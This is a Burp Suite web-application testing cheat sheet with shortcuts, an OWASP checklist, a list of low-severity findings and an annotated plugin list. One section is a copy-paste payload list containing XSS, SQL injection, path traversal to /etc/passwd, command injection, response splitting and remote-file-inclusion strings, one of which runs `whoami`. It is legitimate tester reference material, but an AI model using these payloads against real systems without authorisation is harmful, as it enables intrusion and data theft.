應用安全-工具使用-Burpsuite

A cheat sheet for PortSwigger Burp Suite application security testing framework.

Send to Repeater

Ctrl+R

Send to Intruder

Ctrl+I

Forward intercepted Proxy message

Ctrl+F

Toggle Proxy interception

Ctrl+T

Switch to Target

Ctrl+Shift+T

Switch to Proxy

Ctrl+Shift+P

Switch to Scanner

Ctrl+Shift+S

Switch to Intruder

Ctrl+Shift+I

Switch to Repeater

Ctrl+Shift+R

Switch to Suite options

Ctrl+Shift+O

Switch to Alerts tab

Ctrl+Shift+A

Go to previous tab

Ctrl+Minus

Go to next tab

Ctrl+Equals

##Editor

Cut

Ctrl+X

Copy

Ctrl+C

Paste

Ctrl+V

Undo

Ctrl+Z

Redo

Ctrl+Y

Select all

Ctrl+A

Search

Ctrl+S

Go to previous search match

Ctrl+Comma

Go to next search match

Ctrl+Period

URL-decode

Ctrl+Shift+U

URL-encode key characters

Ctrl+U

HTML-decode

Ctrl+Shift+H

HTML-encode key characters

Ctrl+H

Base64-decode

Ctrl+Shift+B

Base64-encode

Ctrl+B

Backspace word

Ctrl+Backspace

Delete word

Ctrl+Delete

Delete line

Ctrl+D

Go to previous word

Ctrl+Left

Go to previous word (extend selection)

Ctrl+Shift+Left

Go to next word

Ctrl+Right

Go to next word (extend selection)

Ctrl+Shift+Right

Go to previous paragraph

Ctrl+Up

Go to previous paragraph (extend selection)

Ctrl+Shift+Up

Go to next paragraph

Ctrl+Down

Go to next paragraph (extend selection)

Ctrl+Shift+Down

Go to start of document

Ctrl+Home

Go to start of document (extend selection)

Ctrl+Shift+Home

Go to end of document

Ctrl+End

Go to end of document (extend selection)

Ctrl+Shift+End

 

BASIC PASSIVE AND ACTIVE CHECKS:

Burpsuite Spider with intelligent form submission
Manual crawl of website through Burpsuite proxy and submitting INJECTX payloads for tracking
Burpsuite passive scan
Burpsuite engagement tools > Search > <form|<input|url=|path=|load=|INJECTX|Found|<!--|Exception|Query|ORA|SQL|error|Location|crowdshield|xerosecurity|username|password|document\.|location\.|eval\(|exec\(|\?wsdl|\.wsdl
Burpsuite engagement tools > Find comments
Burpsuite engagement tools > Find scripts
Burpsuite engagement tools > Find references
Burpsuite engagement tools > Analyze target
Burpsuite engagement tools > Discover content
Burpsuite Intruder > file/directory brute force
Burpsuite Intruder > HTTP methods, user agents, etc.
Enumerate all software technologies, HTTP methods, and potential attack vectors
Understand the function of the site, what types of data is stored or valuable and what sorts of functions to attack, etc.
ENUMERATION:
OPERATING SYSTEM
WEB SERVER
DATABASE SERVERS
PROGRAMMING LANGUAGES
PLUGINS/VERSIONS
OPEN PORTS
USERNAMES
SERVICES
WEB SPIDERING
GOOGLE HACKING
VECTORS:
INPUT FORMS
GET/POST PARAMS
URI/REST STRUCTURE
COOKIES
HEADERS
SEARCH STRINGS:
Just some helpful regex terms to search for passively using Burpsuite or any other web proxy...

fname|phone|id|org_name|name|email
QUICK ATTACK STRINGS:
Not a complete list by any means, but when you're manually testing and walking through sites and need a quick copy/paste, this can come in handy...

Company
First Last
username
username@mailinator.com
Password123$
+1416312384
google.com
https://google.com
//google.com
.google.com
https://google.com/.injectx/rfi_vuln.txt
https://google.com/.injectx/rfi_vuln.txt?`whoami`
https://google.com/.injectx/rfi_vuln.txt%00.png
https://google.com/.injectx/rfi_vuln.txt%00.html
12188
01/01/1979
4242424242424242
INJECTX
'>"></INJECTX>(1)
javascript:alert(1)//
"><img/onload=alert(1)>' -- 
"></textarea><img/onload=alert(1)>' -- 
INJECTX'>"><img/src="https://google.com/.injectx/xss_vuln.png"></img>
'>"><iframe/onload=alert(1)></iframe>
INJECTX'>"><ScRiPt>confirm(1)<ScRiPt>
"></textarea><img/onload=alert(1)>' -- // INJECTX <!-- 
"><img/onload=alert(1)>' -- // INJECTX <!-- 
INJECTX'"><h1>X<!-- 
INJECTX"><h1>X
en%0AContent-Length%3A%200%0A%0AHTTP%2F1.1%20200%20OK%0AContent-Type%3A%20text%2Fhtml%0AContent-Length%3A%2020%0A%3Chtml%3EINJECTX%3C%2Fhtml%3E%0A%0A
%0AContent-Length%3A%200%0A%0AHTTP%2F1.1%20200%20OK%0AContent-Type%3A%20text%2Fhtml%0AContent-Length%3A%2020%0A%3Chtml%3EINJECTX%3C%2Fhtml%3E%0A%0A
../../../../../../../../../../../etc/passwd%00
{{4+4}}
sleep 5; sleep 5 || sleep 5 | sleep 5 & sleep 5 && sleep 5
admin" or "1"="1"-- 
admin' or '1'='1'-- 
INJECTX%0a%0d%00
OWASP TESTING CHECKLIST:
Spiders, Robots and Crawlers IG-001
Search Engine Discovery/Reconnaissance IG-002
Identify application entry points IG-003
Testing for Web Application Fingerprint IG-004
Application Discovery IG-005
Analysis of Error Codes IG-006
SSL/TLS Testing (SSL Version, Algorithms, Key length, Digital Cert. Validity) - SSL Weakness CM‐001
DB Listener Testing - DB Listener weak CM‐002
Infrastructure Configuration Management Testing - Infrastructure Configuration management weakness CM‐003
Application Configuration Management Testing - Application Configuration management weakness CM‐004
Testing for File Extensions Handling - File extensions handling CM‐005
Old, backup and unreferenced files - Old, backup and unreferenced files CM‐006
Infrastructure and Application Admin Interfaces - Access to Admin interfaces CM‐007
Testing for HTTP Methods and XST - HTTP Methods enabled, XST permitted, HTTP Verb CM‐008
Credentials transport over an encrypted channel - Credentials transport over an encrypted channel AT-001
Testing for user enumeration - User enumeration AT-002
Testing for Guessable (Dictionary) User Account - Guessable user account AT-003
Brute Force Testing - Credentials Brute forcing AT-004
Testing for bypassing authentication schema - Bypassing authentication schema AT-005
Testing for vulnerable remember password and pwd reset - Vulnerable remember password, weak pwd reset AT-006
Testing for Logout and Browser Cache Management - - Logout function not properly implemented, browser cache weakness AT-007
Testing for CAPTCHA - Weak Captcha implementation AT-008
Testing Multiple Factors Authentication - Weak Multiple Factors Authentication AT-009
Testing for Race Conditions - Race Conditions vulnerability AT-010
Testing for Session Management Schema - Bypassing Session Management Schema, Weak Session Token SM-001
Testing for Cookies attributes - Cookies are set not ‘HTTP Only’, ‘Secure’, and no time validity SM-002
Testing for Session Fixation - Session Fixation SM-003
Testing for Exposed Session Variables - Exposed sensitive session variables SM-004
Testing for CSRF - CSRF SM-005
Testing for Path Traversal - Path Traversal AZ-001
Testing for bypassing authorization schema - Bypassing authorization schema AZ-002
Testing for Privilege Escalation - Privilege Escalation AZ-003
Testing for Business Logic - Bypassable business logic BL-001
Testing for Reflected Cross Site Scripting - Reflected XSS DV-001
Testing for Stored Cross Site Scripting - Stored XSS DV-002
Testing for DOM based Cross Site Scripting - DOM XSS DV-003
Testing for Cross Site Flashing - Cross Site Flashing DV-004
SQL Injection - SQL Injection DV-005
LDAP Injection - LDAP Injection DV-006
ORM Injection - ORM Injection DV-007
XML Injection - XML Injection DV-008
SSI Injection - SSI Injection DV-009
XPath Injection - XPath Injection DV-010
IMAP/SMTP Injection - IMAP/SMTP Injection DV-011
Code Injection - Code Injection DV-012
OS Commanding - OS Commanding DV-013
Buffer overflow - Buffer overflow DV-014
Incubated vulnerability - Incubated vulnerability DV-015
Testing for HTTP Splitting/Smuggling - HTTP Splitting, Smuggling DV-016
Testing for SQL Wildcard Attacks - SQL Wildcard vulnerability DS-001
Locking Customer Accounts - Locking Customer Accounts DS-002
Testing for DoS Buffer Overflows - Buffer Overflows DS-003
User Specified Object Allocation - User Specified Object Allocation DS-004
User Input as a Loop Counter - User Input as a Loop Counter DS-005
Writing User Provided Data to Disk - Writing User Provided Data to Disk DS-006
Failure to Release Resources - Failure to Release Resources DS-007
Storing too Much Data in Session - Storing too Much Data in Session DS-008
WS Information Gathering - N.A. WS-001
Testing WSDL - WSDL Weakness WS-002
XML Structural Testing - Weak XML Structure WS-003
XML content-level Testing - XML content-level WS-004
HTTP GET parameters/REST Testing - WS HTTP GET parameters/REST WS-005
Naughty SOAP attachments - WS Naughty SOAP attachments WS-006
Replay Testing - WS Replay Testing WS-007
AJAX Vulnerabilities - N.A. AJ-001
AJAX Testing - AJAX weakness AJ-002
LOW SEVERITY:
A list of low severity findings that are likely out of scope for most bug bounty programs but still helpful to reference for normal web penetration tests.

Descriptive error messages (e.g. Stack Traces, application or server errors).
HTTP 404 codes/pages or other HTTP non-200 codes/pages.
Banner disclosure on common/public services.
Disclosure of known public files or directories, (e.g. robots.txt).
Click-Jacking and issues only exploitable through click-jacking.
CSRF on forms which are available to anonymous users (e.g. the contact form).
Logout Cross-Site Request Forgery (logout CSRF).
Presence of application or web browser ‘autocomplete’ or ‘save password’ functionality.
Lack of Secure and HTTPOnly cookie flags.
Lack of Security Speedbump when leaving the site.
Weak Captcha / Captcha Bypass
Username enumeration via Login Page error message
Username enumeration via Forgot Password error message
Login or Forgot Password page brute force and account lockout not enforced.
OPTIONS / TRACE HTTP method enabled
SSL Attacks such as BEAST, BREACH, Renegotiation attack
SSL Forward secrecy not enabled
SSL Insecure cipher suites
The Anti-MIME-Sniffing header X-Content-Type-Options
Missing HTTP security headers
Security best practices without accompanying Proof-of-Concept exploitation
Descriptive error messages (e.g. Stack Traces, application or server errors).
HTTP 404 codes/pages or other HTTP non-200 codes/pages.
Denial of Service Attacks.
Fingerprinting / banner disclosure on common/public services.
Disclosure of known public files or directories, (e.g. robots.txt).
Clickjacking and issues only exploitable through clickjacking.
CSRF on non-sensitive forms.
Logout Cross-Site Request Forgery (logout CSRF).
Presence of application or web browser ‘autocomplete’ or ‘save password’ functionality.
Lack of Secure/HTTPOnly flags on non-sensitive Cookies.
Lack of Security Speedbump when leaving the site.
Weak Captcha / Captcha Bypass
Login or Forgot Password page brute force and account lockout not enforced.
OPTIONS HTTP method enabled
HTTPS Mixed Content Scripts
Known vulnerable libraries
Attacks on Third Party Ad Services
Username / email enumeration via Forgot Password or Login page
Missing HTTP security headers
Strict-Transport-Security Not Enabled For HTTPS
X-Frame-Options
X-XSS-Protection
X-Content-Type-Options
Content-Security-Policy, X-Content-Security-Policy, X-WebKit-CSP
Content-Security-Policy-Report-Only
SSL Issues, e.g.
SSL Attacks such as BEAST, BREACH, Renegotiation attack
SSL Forward secrecy not enabled
SSL weak / insecure cipher suites
Lack of SPF records (Email Spoofing)
Auto-complete enabled on password fields
HTTP enabled
Session ID or Login Sent Over HTTP
Insecure Cookies
Cross-Domain.xml Allows All Domains
HTML5 Allowed Domains
Cross Origin Policy
Content Sniffing Not Disabled
Password Reset Account Enumeration
HTML Form Abuse (Denial of Service)
Weak HSTS Age (86,000 or less)
Lack of Password Security Policy (Brute Forcable Passwords)
Physical Testing
Denial of service attacks
Resource Exhaustion attacks
Issues related to rate limiting
Login or Forgot Password page brute force and account lockout not enforced
api*.netflix.com listens on port 80
Cross-domain access policy scoped to *.netflix.com
Username / Email Enumeration
via Login Page error message
via Forgot Password error message
via Registration
Weak password
Weak Captcha / Captcha bypass
Lack of Secure/HTTPOnly flags on cookies
Cookie valid after logout
Cookie valid after password reset
Cookie expiration
Forgot password autologin
Autologin token reuse
Same Site Scripting
SSL Issues, e.g.
SSL Attacks such as BEAST, BREACH, Renegotiation attack
SSL Forward secrecy not enabled
SSL weak / insecure cipher suites
SSL vulnerabilities related to configuration or version
Descriptive error messages (e.g. Stack Traces, application or server errors).
HTTP 404 codes/pages or other HTTP non-200 codes/pages.
Fingerprinting/banner disclosure on common/public services.
Disclosure of known public files or directories, (e.g. robots.txt).
Clickjacking and issues only exploitable through clickjacking.
CSRF on forms that are available to anonymous users (e.g. the contact form).
Logout Cross-Site Request Forgery (logout CSRF).
Missing CSRF protection on non-sensitive functionality
Presence of application or web browser ‘autocomplete’ or ‘save password’ functionality.
Incorrect Charset
HTML Autocomplete
OPTIONS HTTP method enabled
TRACE HTTP method enabled
Missing HTTP security headers, specifically
(https://www.owasp.org/index.php/List_of_useful_HTTP_headers), e.g.
Strict-Transport-Security
X-Frame-Options
X-XSS-Protection
X-Content-Type-Options
Content-Security-Policy, X-Content-Security-Policy, X-WebKit-CSP
Content-Security-Policy-Report-Only
Issues only present in old browsers/old plugins/end-of-life software browsers
IE < 9
Chrome < 40
Firefox < 35
Safari < 7
Opera < 13
Vulnerability reports related to the reported version numbers of web servers, services, or frameworks

View Code

 

插件

jsEncrypter.0.3  #對請求數據加密處理
HackBar.jar              
LFI scanner checks.jar        #LFI檢測
burp-vulners-scanner-1.2.jar    #漏洞庫對比
burplogger++.jar    #擴展日誌模塊
chunked-coding-converter.0.2.1.jar    #waf bypass
domain_hunter-v1.4.jar  #域名收集
knife-v1.4.jar   #字符轉換
reCAPTCHA-v0.9.jar  #爆破驗證碼
sqlmap.jar  #sqlmap api
AES-Encrypter  
Assassin  #子域名爆破 | 旁註查詢
AuthMatrix  #越權漏洞檢測
Blazer  #AMF Messages
BurpAMFDSer  #AMF
BurpAuthzPlugin    #可用AuthMatrix代替
BurpCSJ
BurpDOMXSS
BurpHeartbleedExtension
BurpHistorytoMysql
BurpJDSer-ng
BurpJDSer
BurpMultiDEC
BurpNotesExtension
BurpPassiveXssScan
BurpPatchMe
BurpSentinel
BurpSessionAuth
BurpSmartBuster
BurpWebSphere
Burp_CustomScannerChecks
Burp_saml  #單點登陸
DOMXSSHilight
J2EEScan  #可被LFI scanner checks取代
JSON
JavaScriptInjector  #JS注入
MobileMiTM  #中間人攻擊
POST2JSON   
PT-Manager
Refeffer
SAMLRaider
W3af  #防火牆類型檢測
WCF-Binary-SOAP-Plug-In  #WCF相關
Wsdler
Yara-Scanner  #惡意樣本識別
aesburp AES Tool
autoEdit
burp-Curlit
burp-git-bridge
burp-massimpo
burp-msc
burp-protobuf-decoder
burp-radamsa
burp_Gwtscan
burp_JSBeautifier
burp_extension-googlehack
burp_extension_MultiScanner
burp_extension_nmap_parser
burp_extension_payloadparser
burp_wicket_handler
CSRFScanner #CSRF檢測
distribute-damage
faraday
jsEncrypter add jsEncrypter.jar
scriptgen
sleepy-puppy
xssValidator
xssless
BurpCO2_v1_0_0RC1.jar
BurpFlashCSRFBuilder-0.1.4.jar
BurpKit.jar add BurpKit.jar
BurpMultiProxy.jar
BurpMultiProxy_ListVer.jar
BurpPlugin-full.jar
Burp_MultiProxy.py
GrabTencentExmailContacts.jar
JavaSerialKiller.jar
LICENSE
README
activeScan++.py
aesburp_fat.jar
burp-image-size.jar
burp-paramalyzer.jar
burp-retire-js-2.jar
burpbuddy-2.0.0.jar
bypasswaf.jar   #waf bypass 
changeu.py  
csrf-master.zip
key.bin
parrotng_v0.2.jar
rhinauditor-burp-plugin-1.jar
scriptgen-burp-plugin-3.jar
sentinelburp.xpi
shodanapi.py
sitemap-Import_links.py
threadfix-release-2.jar
update.bat
update.sh
ws.jar